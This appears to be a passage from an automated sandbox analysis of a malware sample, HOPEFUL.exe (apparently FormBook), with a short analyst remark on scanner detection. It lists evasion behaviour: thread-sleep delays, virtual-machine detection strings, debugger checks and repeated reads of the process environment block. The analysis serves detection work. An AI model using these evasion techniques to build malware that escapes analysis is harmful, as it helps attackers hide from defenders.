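          With the fragment based at 0x4098DE the scanner reports exactly the pair the sandbox saw; the two trailing reads are 49 and 42 bytes apart and only show up when the window is widened. Run it over the unpacked 5.2.AddInProcess32.exe.400000.0.unpack image rather than the packed HOPEFUL.exe, since the probe lives in the unpacked FormBook code, not in the .NET loader.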
          Source: C:\Users\user\Desktop\HOPEFUL.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\HOPEFUL.exe Window / User API: threadDelayed 851
          Source: C:\Users\user\Desktop\HOPEFUL.exe Window / User API: threadDelayed 9007
          Source: C:\Users\user\Desktop\HOPEFUL.exe TID: 6816 Thread sleep time: -8301034833169293s >= -30000s
          Source: C:\Users\user\Desktop\HOPEFUL.exe TID: 6816 Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\HOPEFUL.exe TID: 6820 Thread sleep count: 851 > 30
          Source: C:\Users\user\Desktop\HOPEFUL.exe TID: 6820 Thread sleep count: 9007 > 30
          Source: C:\Windows\explorer.exe TID: 5888 Thread sleep count: 33 > 30
          Source: C:\Windows\explorer.exe TID: 5888 Thread sleep time: -66000s >= -30000s
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 5408 Thread sleep time: -65000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp Binary or memory string: VMware
          Source: explorer.exe, 0000000D.00000000.318661588.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000D.00000000.318661588.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp Binary or memory string: vmware svga
          Source: explorer.exe, 0000000D.00000000.317989634.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000000D.00000000.318372391.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp Binary or memory string: tpautoconnsvc#Microsoft Hyper-V
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp Binary or memory string: cmd.txtQEMUqemu
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp Binary or memory string: vmusrvc
          Source: explorer.exe, 0000000D.00000002.573815285.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp Binary or memory string: vmsrvc
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp Binary or memory string: vmtools
          Source: explorer.exe, 0000000D.00000000.318661588.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 0000000D.00000000.318661588.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp Binary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
          Source: explorer.exe, 0000000D.00000000.310824417.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp Binary or memory string: vboxservicevbox)Microsoft Virtual PC
          Source: explorer.exe, 0000000D.00000000.317989634.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000D.00000000.317989634.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp Binary or memory string: virtual-vmware pointing device
          Source: explorer.exe, 0000000D.00000000.317989634.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\HOPEFUL.exe Process information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_00409A90 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_0184A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_0183C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01842581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01842581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01842581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01842581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01812D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01812D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01812D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01812D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01812D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01842990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_0184FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_0184FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_018E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_018E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_018461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_018461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_018435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_018969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01841DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01841DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01841DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_018951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_018951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_018951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_018951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01896DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01896DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01896DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01896DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01896DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01896DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_0181B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_0181B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_0181B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_018A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_0182D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_0182D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_018DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_018DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_018DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_018DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_018C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01819100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01819100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01819100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01834120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01834120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01834120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01834120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01834120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_0181AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_018DE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0189A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01844D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01844D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01844D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01853D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01893540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01837D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01819080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01893884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01893884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01896CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01896CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01896CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01896C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01896C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01896C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01896C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01897016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01897016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01897016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01830050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01830050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01821B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01821B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01842397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01828794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01897794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01897794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01897794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01844BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01844BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01844BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184A70E mov eax, dword ptr fs:[00000030h]
